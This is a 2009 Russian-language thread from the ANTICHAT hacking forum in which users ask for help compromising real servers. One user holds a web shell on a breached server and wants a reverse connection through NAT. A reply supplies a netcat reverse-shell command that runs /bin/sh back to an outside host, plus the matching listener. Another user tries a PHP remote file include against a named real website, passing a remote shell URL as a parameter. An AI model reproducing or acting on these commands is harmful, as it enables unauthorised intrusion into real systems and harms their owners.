HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6161  
Старый 25.03.2009, 17:46
serg88
Участник форума
Регистрация: 30.07.2006
Сообщений: 148
С нами: 10411711

Репутация: 215
По умолчанию

Решил вспомнить молодость зашел на Майл.ру чат - и нефига чото у меня неотображает сообщения то

чо тако ??
 
Ответить с цитированием

  #6162  
Старый 25.03.2009, 18:14
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами: 9561436

Репутация: 462
По умолчанию

Цитата:
Сообщение от Imperou$  
Поимел шелл на серваке, сплоит под это ядро имеется, gcc есть, но не могу забиндить порт (фаер блочит видимо), тупо виснет.Скомпилить через шелл так же не вышло.Бэк коннект средствами шелла пишет "Now script try connect to ИП port ПОРТ", но netcat молчит =( Возможно сижу за натом. Кто может помочь? В пм плиз.
З.Ы. Порты разные пробовал, shell - r57
фаер скорей всего и блочит. попробуй забиндить под бэккэнект уже открытый порт.

или я туплю, и нечего не выйдет?)) скорей всего ничего и не выйдет, ели фаер умный)

Последний раз редактировалось ph1l1ster; 25.03.2009 в 18:16..
 
Ответить с цитированием

  #6163  
Старый 25.03.2009, 18:15
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Зачем писать это в теме об уязвимостям? Это у тебя с браузером чото!
 
Ответить с цитированием

  #6164  
Старый 25.03.2009, 18:16
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами: 9081715

Репутация: 10
По умолчанию

Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch

Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell

и вот так

http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php

Выводится пустая страница. В чем моя ошибка?
 
Ответить с цитированием

  #6165  
Старый 25.03.2009, 18:24
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Цитата:
Сообщение от ПаВлУшКа  
Набрел на сайт, вроде есть php-инъекция. Вот сайт: http://linuxgamers.net/infoPage.php?page=acidlaunch

Пробовал инклудить шелл вот так http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell

и вот так

http://linuxgamers.net/infoPage.php?page=http://site.narod.ru/shell.php

Выводится пустая страница. В чем моя ошибка?
с чего ты взял что там php injection?

Последний раз редактировалось z00MAN; 25.03.2009 в 18:43..
 
Ответить с цитированием

  #6166  
Старый 25.03.2009, 18:26
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами: 9081715

Репутация: 10
По умолчанию

z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?
 
Ответить с цитированием

  #6167  
Старый 25.03.2009, 18:31
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Цитата:
Сообщение от ПаВлУшКа  
z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?
не факт
не обязательно если выходит ошибка при "page=blalbabla" то есть php injection

Последний раз редактировалось z00MAN; 25.03.2009 в 18:42..
 
Ответить с цитированием

  #6168  
Старый 25.03.2009, 18:40
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами: 9456679

Репутация: 97
По умолчанию

Цитата:
Сообщение от ph1l1ster  
фаер скорей всего и блочит. попробуй забиндить под бэккэнект уже открытый порт.

или я туплю, и нечего не выйдет?)) скорей всего ничего и не выйдет, ели фаер умный)
Как это-забиндить под бэкконнект? Если я смогу забиндить-то нах мне бэкконнект?
Просто мне нужно узнать, как например поставить бэкконнект не на мой ип, а на левую тачку, к которой у меня есть доступ (скажем так), или подобный вариант, т.к. я сижу за натом, как оказалось.
 
Ответить с цитированием

  #6169  
Старый 25.03.2009, 18:43
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

биндишь порт - не факт что приконектишься
для бекконекта неткатом
nc -v www.adres_deda.com -e /bin/sh &
на деде nc -l -p
помоему так
 
Ответить с цитированием

  #6170  
Старый 25.03.2009, 20:43
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию

Цитата:
Сообщение от ПаВлУшКа  
z00MAN, а что там? Я так понимаю если при таком запросе http://linuxgamers.net/infoPage.php?page=blalbabla
вылазиет ошибка, значит он возможен?
или нет?
Что за ошибка то?
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.